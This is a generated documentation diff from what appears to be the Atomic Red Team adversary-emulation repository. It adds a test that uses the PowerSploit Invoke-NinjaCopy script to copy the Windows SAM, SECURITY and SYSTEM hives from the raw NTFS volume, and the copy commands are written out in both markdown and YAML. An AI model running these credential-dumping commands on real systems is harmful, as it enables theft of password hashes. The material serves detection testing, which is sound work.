Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1003/T1003.md

@@ -159,6 +159,8 @@ The /proc filesystem on Linux contains a great deal of information regarding the
 
 - [Atomic Test #12 - GPP Passwords (Get-GPPPassword)](#atomic-test-12---gpp-passwords-get-gpppassword)
 
+- [Atomic Test #13 - Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script](#atomic-test-13---dump-sam-security-and-system-files-using-ninjacopy-powershell-script)
+
 
 <br/>
 
@@ -429,4 +431,38 @@ Get-GPPPassword -Verbose
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #13 - Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
+This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
+Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam|
+| system_binary_path | Path of the SYSTEM file | string | C:\Windows\System32\config\system|
+| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security|
+| output_folder | Output folder path | Path | C:\Windows\Temp|
+
+#### Run it with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+. $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
+Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
+Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
+Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
+```
+
+
+#### Cleanup Commands:
+```
+rm "#{output_folder}\sam"
+rm "#{output_folder}\system"
+rm "#{output_folder}\security"
+```
+
 <br/>

atomics/index.md

@@ -662,6 +662,7 @@
   - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
   - Atomic Test #11: GPP Passwords (findstr) [windows]
   - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
+  - Atomic Test #13: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script [windows]
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]

atomics/index.yaml

@@ -19627,6 +19627,41 @@ credential-access:
         command: |
           . #{gpp_script_path}
           Get-GPPPassword -Verbose
+    - name: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
+      description: |
+        This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
+        Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
+      supported_platforms:
+      - windows
+      input_arguments:
+        sam_binary_path:
+          description: Path of the SAM file
+          type: string
+          default: C:\Windows\System32\config\sam
+        system_binary_path:
+          description: Path of the SYSTEM file
+          type: string
+          default: C:\Windows\System32\config\system
+        security_binary_path:
+          description: Path of the SECURITY file
+          type: string
+          default: C:\Windows\System32\config\security
+        output_folder:
+          description: Output folder path
+          type: Path
+          default: C:\Windows\Temp
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          . $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
+          Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
+          Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
+          Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
+        cleanup_command: |-
+          rm "#{output_folder}\sam"
+          rm "#{output_folder}\system"
+          rm "#{output_folder}\security"
   T1081:
     technique:
       x_mitre_permissions_required:

atomics/windows-index.md

@@ -476,6 +476,7 @@
   - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
   - Atomic Test #11: GPP Passwords (findstr) [windows]
   - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
+  - Atomic Test #13: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script [windows]
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #3: Extracting passwords with findstr [windows]